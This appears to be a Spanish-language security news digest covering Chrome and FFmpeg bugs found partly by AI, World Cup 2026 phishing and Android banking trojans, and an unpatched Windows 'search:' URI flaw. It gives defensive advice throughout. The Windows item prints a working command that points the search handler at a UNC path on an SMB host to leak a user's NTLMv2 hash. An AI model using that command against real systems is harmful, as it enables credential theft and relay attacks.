La peor, CVE-2026-10881 (CVSS 9.6), es una vulnerabilidad de lectura y escritura fuera de límites en el motor gráfico ANGLE que permite que una página manipulada escape del entorno aislado y ejecute código en el host. Google pagó 97.000 dólares por ella.

Los errores de mayor gravedad fueron en su mayoría hallazgos internos: de aproximadamente 90 errores de alta gravedad, solo 10 provenían de investigadores externos, y 19 de los 22 críticos fueron descubiertos por la propia Google. La conexión con la IA se relaciona más con el volumen que con la autoría.

Google no ha vinculado el error 429 con la IA; la señal oficial es la revisión del programa de recompensas que realizó en abril, motivada por una avalancha de informes generados por IA, y que ahora solicita un método de reproducción conciso en lugar de los extensos informes que produce la IA.

El agente Big Sleep de Google reportó una serie de errores en FFmpeg el año pasado, ahora visibles en la página de seguridad del proyecto, etiquetada como BIGSLEEP. El modelo Mythos de Anthropic extrajo una vulnerabilidad de H.264 de 16 años de antigüedad y otras de FFmpeg por aproximadamente $10.000, tres de las cuales se incluyeron en FFmpeg 8.1, según su propio informe.

Para actualizar FFmpeg, descargue la compilación corregida del proyecto original o la actualización de seguridad de su distribución tan pronto como esté disponible, y priorice cualquier cosa que consuma RTSP no confiable o AV1-over-RTP. FFmpeg se incluye ampliamente en pipelines multimedia, paquetes Python, imágenes de contenedores y dispositivos, así que no se limite a los paquetes del sistema; esas copias integradas también necesitan parches.

Encontrar estos errores se ha vuelto económico; clasificar los informes, distribuir las correcciones e instalarlas no lo ha sido, y gran parte de ese trabajo aún recae en voluntarios y un pequeño grupo de personas que ahora deben seguir el ritmo de las máquinas.

Fuente: THN

Seguir leyendo...

Comienza el mundial.. Así te infectan

Investigadores de seguridad y el FBI advierten que una ola de fraudes relacionados con la FIFA ya está afectando a los aficionados del Mundial de 2026, a pocos días del inicio, el 11 de junio.

Informes recientes describen miles de dominios que imitan a la FIFA, malware bancario oculto en aplicaciones piratas de streaming y al menos una operación que copia la página de inicio de sesión de la FIFA con la suficiente fidelidad como para suplantar cuentas reales.

Es un objetivo obvio. Se espera la asistencia de más de seis millones de aficionados en 16 ciudades de Estados Unidos, Canadá y México, y la FIFA informó haber recibido más de 150 millones de solicitudes de entradas en los primeros 15 días, lo que significa que el torneo superó en unas 30 veces la capacidad ofrecida. Las entradas son escasas, los aficionados están ansiosos y el dinero circula rápidamente, lo que crea el ambiente propicio para el fraude.

Un operador, 300 sitios web de la FIFA clonados

Los hallazgos más detallados provienen de Group-IB, que rastreó más de 4.300 dominios fraudulentos de la FIFA registrados desde agosto de 2025. En el centro de todo se encuentra un grupo denominado GHOST STADIUM, una operación de habla china con fines lucrativos que utiliza un único kit de phishing en más de 300 de esos sitios.

La falsificación es muy efectiva. La página es una copia casi perfecta de FIFA e imita el inicio de sesión único real de la FIFA, gestionado por PingIdentity, incluyendo el ID de cliente genuino copiado del sitio web en funcionamiento. Carga las imágenes directamente desde los servidores de la FIFA, por lo que la página parece auténtica y evade las herramientas que detectan imágenes copiadas.

Aquí está el punto clave: la página de inicio de sesión falsa también solicita restablecer la contraseña. Una vez que la víctima ingresa sus datos, el atacante puede bloquear su cuenta de la FIFA y revender las entradas asociadas.

La mayor parte del tráfico proviene de anuncios de Facebook, con los mismos códigos de seguimiento reutilizados en todo el clúster, además de enlaces en Telegram, WhatsApp y en los resultados de búsqueda. El sitio acepta pagos de cinco maneras diferentes: ingreso directo de tarjeta, pasarelas de pago externas, aplicaciones de transferencia de dinero como Chime y Nequi, procesadores exclusivos de México y una opción de criptomonedas que convierte el pago con tarjeta en criptomonedas, mucho más difíciles de recuperar.

Esta última opción es una señal de alerta, ya que la venta oficial de entradas de la FIFA nunca acepta criptomonedas, por lo que cualquier vendedor que las solicite es una estafa.

Group-IB estima que las pérdidas por fraude en entradas premium y de hospitalidad oscilan entre 71 y 474 millones de dólares, y afirma que toda la campaña podría ascender a miles de millones. Estas son estimaciones basadas en la infraestructura que pueden observar, no pérdidas confirmadas.

Miles de dominios, muchos tipos de estafas

FortiGuard Labs contabilizó más de 13.000 dominios relacionados con la Copa Mundial registrados entre enero y mayo, de los cuales aproximadamente el 8,8% eran maliciosos o sospechosos.

El aviso del FBI enumera decenas de dominios falsos de la FIFA, desde imitaciones con errores ortográficos hasta páginas falsas de empleos de la FIFA, y advierte que aparecerán más. Otros investigadores han identificado miles de sitios similares y más de mil cuentas falsas en redes sociales.

El fraude con entradas es solo una parte del problema. Group-IB también descubrió tiendas de productos falsificados, sitios de streaming fraudulentos que cobran una suscripción y luego instalan malware que otorga el control al atacante, y sitios de apuestas falsos que recopilan escaneos de pasaportes y selfies para el robo de identidad.

Bitdefender rastreó por separado correos electrónicos de la lotería de la FIFA que prometían premios de hasta 2 millones de dólares. Group-IB también identificó un mercado de "phishing como servicio" que vende kits de estafa listos para usar y bots para comprar entradas, por lo que desmantelar un operador apenas ayuda.

Las piezas encajan: dominios falsos captan las búsquedas de entradas, los anuncios y los resultados de búsqueda impulsan el tráfico, el robo de contraseñas facilita el acceso no autorizado a cuentas, y las aplicaciones instaladas de forma no autorizada convierten la búsqueda de transmisiones en un fraude bancario.

Malware bancario oculto en aplicaciones de streaming

Para los aficionados que buscan transmisiones gratuitas de partidos, el mayor peligro reside en el teléfono. ThreatFabric detectó un aumento repentino de aplicaciones de streaming no oficiales maliciosas, muchas de ellas haciéndose pasar por la popular RojaDirecta, durante la reciente final de la Liga de Campeones, y prevé que se repita una situación similar en el Mundial, pero a mayor escala.

Kaspersky vinculó estas mismas aplicaciones con troyanos bancarios para Android, malware diseñado para robar dinero de aplicaciones bancarias y de criptomonedas, e identificó dos familias: Massiv y Perseus. Estas aplicaciones no están disponibles en Google Play, por lo que instalar una implica ignorar las advertencias que normalmente la bloquearían.

Una vez instalado, el malware utiliza las herramientas de accesibilidad de Android para tomar el control del teléfono. Puede superponer pantallas de inicio de sesión bancarias falsas sobre aplicaciones reales, registrar lo que escribe el propietario, interceptar los códigos de un solo uso de los mensajes de texto y las aplicaciones de inicio de sesión que están destinados a mantener las cuentas seguras, y controlar la pantalla de forma remota.

Perseus, basado en el código filtrado de un troyano antiguo llamado Cerberus, incluso lee aplicaciones de notas para obtener contraseñas guardadas y frases de recuperación de criptomonedas. La señal de alerta más simple, según ThreatFabric, es una aplicación de streaming que solicita acceso de accesibilidad. No tiene ninguna razón válida para necesitarlo.

Estafas en redes sociales, accesos robados y Wi-Fi de riesgo

Las redes sociales también están plagadas de estafas. Bitdefender detectó más de 55 campañas publicitarias con temática futbolística en Facebook e Instagram, que promocionaban equipos falsificados, pegatinas Panini falsas y páginas de phishing; dos de estas operaciones de venta de productos se rastrearon hasta operadores chinos a través de sus etiquetas de seguimiento de anuncios.

Fortinet contabilizó más de 1.700 cuentas suplantadas de la FIFA, casi el 90% de ellas en Facebook e Instagram, además de un esquema que utilizaba anuncios de empleo falsos de la FIFA e invitaciones de calendario para redirigir a los solicitantes a un inicio de sesión de Google que imitaba al de la FIFA.

Ya circulan credenciales de acceso robadas de la FIFA. Fortinet encontró cientos de miles de credenciales de usuario, además de más de 4600 direcciones web de la FIFA, en datos robados por malware de robo de credenciales como Vidar, LummaC2, y RedLine.

El Wi-Fi en las ciudades anfitrionas representa un problema en sí mismo. Un estudio de Kaspersky realizado en Ciudad de México, Monterrey y Guadalajara reveló que entre el 10% y el 12% de las redes estaban abiertas y sin contraseña, con la función de emparejamiento WPS activada en casi la mitad. Esto crea vulnerabilidades que permiten la creación de puntos de acceso falsos, imitando una red legítima y leyendo su tráfico sin que se dé cuenta.

¿Qué debes tener en cuenta?

Estas estafas dejan señales claras. Compra solo a través de fifa.com e introduce la dirección manualmente en lugar de confiar en un anuncio o un resultado de búsqueda. Activa la autenticación multifactor y desconfía de cualquier vendedor que solicite el pago en criptomonedas, ya que la venta de entradas de la FIFA nunca las requiere.

En Android, la señal de alerta más evidente es una aplicación de streaming que solicita acceso de accesibilidad innecesario. En redes Wi-Fi públicas en las ciudades sede, utilice datos móviles siempre que sea posible y evite iniciar sesión en cuentas bancarias o de correo electrónico.

Para los equipos de seguridad, la tarea es sencilla: estar atentos a nuevos dominios con temática de la FIFA y páginas de inicio de sesión similares, marcar cualquier inicio de sesión de empleados o clientes que aparezca en los registros de robo de Vidar, LummaC2 o RedLine, y preparar a los equipos de prevención de fraude para un aumento repentino de incidencias y contracargos hasta mediados de julio.

Meta afirma estar tomando medidas. Ahora muestra ventanas emergentes de advertencia cuando se buscan entradas para la FIFA en Facebook, y se asoció con Visa para desmantelar una red de Facebook vinculada a sitios web falsos del Mundial que promovían apuestas fraudulentas. El FBI solicita a quienes hayan sido víctimas de estafas que lo denuncien ante el IC3.

La mayor preocupación reside en lo que aún está pendiente. Group-IB contabilizó aproximadamente 3.800 dominios fraudulentos de la FIFA inactivos, listos para activarse. Con kits de estafa y bots ya disponibles para la venta, el período de mayor actividad es evidente: del 11 de junio al 19 de julio, cuando las búsquedas de entradas, transmisiones y viajes alcancen su punto máximo.

Fuente: THN

Seguir leyendo...

Vulnerabilidad sin parchear en la URI de búsqueda de Windows permite a los atacantes robar hashes NTLMv2

Investigadores de ciberseguridad han revelado detalles de una vulnerabilidad sin parchear que podría explotarse para obtener el hash NTLMv2 de un usuario.

Como resultado, un atacante podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema, declarando que "solo los casos de gravedad Importante y Crítica cumplen con nuestros criterios para recibir soporte".

Al igual que en el caso de CVE-2026-33829, que afectaba al controlador de URI `ms-screensketch:` de la herramienta Recortes de Windows, la nueva vulnerabilidad detectada reside en el controlador de URI `search:`, según Huntress.

CVE-2026-33829 se refiere a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un atacante no autorizado.

"Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra URL, insertándolo en una página web o un correo electrónico", señaló Microsoft en su aviso de seguridad en aquel momento.

Si el usuario aprueba la apertura del enlace, la URL manipulada puede inducir al equipo a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como tal.

En concreto, el problema radicaba en que el controlador de URI de la Herramienta Recortes aceptaba un parámetro "filePath", no lo validaba y accedía a cualquier ruta UNC (Convención de Nombres Universales) que se le pasara. Esto, a su vez, podía activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

La vulnerabilidad recientemente descubierta logra el mismo objetivo final utilizando "search:" y "crumb=location:" en lugar de "filePath" con un comando como el siguiente:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"Utilizaba el mismo mecanismo de fuga NTLM, producía la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y la misma calificación de Moderada", afirmó Andrew Schwartz, investigador de Huntress. Cabe destacar que el uso del parámetro "crumb" para robar el hash (CVE-2023-35636) fue documentado por Varonis en febrero de 2024.

A falta de una solución, se recomienda bloquear el tráfico SMB saliente (TCP/445 y TCP/139) en los hosts que no lo necesiten, exigir la firma SMB para que los hashes capturados no puedan reenviarse a servicios internos y deshabilitar NTLM donde corresponda.

Actualización: Este repositorio contiene una herramienta automatizada en Bash diseñada para auditar y verificar de manera pasiva y controlada si los activos con sistema operativo Windows son vulnerables a la manipulación insegura del manejador de protocolo search:.

Fuente: THN

Seguir leyendo...